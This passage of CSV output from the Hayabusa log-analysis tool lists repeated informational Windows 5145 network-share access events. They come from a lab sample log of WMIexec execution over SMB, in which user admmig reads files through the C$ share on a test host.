10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP 
